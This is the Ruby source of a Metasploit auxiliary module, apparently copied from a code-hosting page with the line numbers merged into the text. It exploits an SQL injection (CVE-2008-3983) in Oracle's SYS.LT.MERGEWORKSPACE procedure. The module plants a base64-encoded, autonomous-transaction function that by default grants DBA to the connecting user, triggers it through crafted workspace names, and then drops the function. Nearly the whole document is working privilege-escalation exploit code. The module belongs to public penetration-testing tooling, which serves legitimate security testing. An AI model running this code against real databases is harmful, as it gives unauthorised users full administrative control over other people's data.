Path: blob/master/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::ORACLE78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE',13'Description' => %q{14This module exploits a sql injection flaw in the MERGEWORKSPACE15procedure of the PL/SQL package SYS.LT. Any user with execute16privilege on the vulnerable package can exploit this vulnerability.17},18'Author' => [ 'CG' ],19'License' => MSF_LICENSE,20'References' => [21[ 'CVE', '2008-3983'],22[ 'OSVDB', '49325'],23[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],24[ 'URL', 'http://www.dsecrg.com/pages/expl/show.php?id=23' ]2526],27'DisclosureDate' => '2008-10-22',28'Notes' => {29'Stability' => [CRASH_SAFE],30'SideEffects' => [IOC_IN_LOGS],31'Reliability' => []32}33)34)3536register_options(37[38OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]),39]40)41end4243def run44return if !check_dependencies4546name = Rex::Text.rand_text_alpha_upper(1..10)47rand1 = Rex::Text.rand_text_alpha_upper(1..10)48rand2 = Rex::Text.rand_text_alpha_upper(1..10)49rand3 = Rex::Text.rand_text_alpha_upper(1..10)50cruft = Rex::Text.rand_text_alpha_upper(1)5152function = "53CREATE OR REPLACE FUNCTION #{cruft}54RETURN VARCHAR2 AUTHID CURRENT_USER55AS56PRAGMA AUTONOMOUS_TRANSACTION;57BEGIN58EXECUTE IMMEDIATE '#{datastore['SQL']}';59COMMIT;60RETURN '#{cruft}';61END;"6263package1 = %|64BEGIN65SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');66END;67|6869package2 = %|70BEGIN71SYS.LT.MERGEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');72END;73|7475uno = Rex::Text.encode_base64(function)76dos = Rex::Text.encode_base64(package1)77tres = Rex::Text.encode_base64(package2)7879sql = %|80DECLARE81#{rand1} VARCHAR2(32767);82#{rand2} VARCHAR2(32767);83#{rand3} VARCHAR2(32767);84BEGIN85#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));86EXECUTE IMMEDIATE #{rand1};87#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));88EXECUTE IMMEDIATE #{rand2};89#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));90EXECUTE IMMEDIATE #{rand3};91END;92|9394clean = "DROP FUNCTION #{cruft}"9596# Try first, if it's good.. keep doing the dance.97print_status('Attempting sql injection on SYS.LT.MERGEWORKSPACE...')98begin99prepare_exec(sql)100rescue StandardError101return102end103104print_status("Removing function '#{cruft}'...")105prepare_exec(clean)106end107end108109110